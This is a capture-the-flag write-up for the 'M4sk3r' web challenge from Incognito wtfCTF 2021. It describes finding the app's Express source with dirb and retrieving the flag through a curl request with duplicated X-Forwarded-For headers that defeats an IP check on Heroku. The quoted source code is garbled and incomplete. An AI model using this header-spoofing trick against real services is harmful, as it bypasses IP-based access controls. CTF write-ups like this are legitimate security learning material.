Incognito wtfCTF 2021: M4sk3r


Category: Web


150 points

Can you Mask it? M4sk3r

Author: Hackerbone


Under the challenge url there’s a simple webpage with flag checker.


I couldn’t find anything, so I’ve given a chance to dirb. After a while of running it found a hint ;-)

+ (CODE:200|SIZE:1644)

The source code of the app as below.

const express = require('express');
const app = express();
const port =  process.env.PORT;
const path = require('path');
const fs = require('fs');

  extended: true

var SOURCE = '';
fs.readFile(path.dirname(__filename+'/index.js'), 'utf-8', (err, data)=>{
  SOURCE = data;
const first = process.env.FIRST
const second = process.env.SECOND

const FLAG = process.env.FLAG
const temp = 'wtfCTF{sc4mm3d_4g41n}'

app.get('/getFlag', (req, res) => {
  if ('x-forwarded-for' in req.headers) {
    // I believe in 0,2,-1
    var InternetProtocols = req.headers['x-forwarded-for'].split(', ')
    if (!InternetProtocols) {
     return res.status(400).send("<h4>Visible confusion</h4>");
    if ((InternetProtocols[first] !== InternetProtocols[second]) || (InternetProtocols[first] !== InternetProtocols[InternetProtocols.length - 1])) {
     return res.status(400).send("<h4>The indices I wanted to check don't match, no flag for you :p</h4>");

    var ip = InternetProtocols[first].toString();
    if (ip != "") {
      return res.status(401).send("Nah, incorrect ip");
    return res.send("Damn, nice one you get to enjoy this : <h4>" + FLAG + "</h4>");

app.get('/', (req, res) => {
  res.sendFile(path.join(__dirname, './' ,'index.html'))

app.get('/source', (req, res) => {
})'/checkFlag', (req,res)=>{
    var inpFlag = req.body.flagInput;

    if(inpFlag === FLAG){
      return res.send("Flag Is Correct! GG");
    res.send("Flag Is wrong");


/getFlag endpoint seems to be the target for exploitation. It checks the X-Forwarded-To header of the request. After of couple of attempts I’ve managed to match all the conditions to get the flag.

curl -H 'X-Forwarded-For:, <REDACTED MY IP ADDRESS>,' -H 'X-Forwarded-For:'
Damn, nice one you get to enjoy this : <h4>wtfCTF{just_4n0th3r_h34d3r}

The reason why it works is that Herokuapp takes first X-Forwarded-For header, appends to it your IP address, and then appends the second X-Forwarded-For header. Header combined that way is finally passed to the application.

I’ve learned the above during one of the previous CTFs…



Privacy Policy
luc © 2021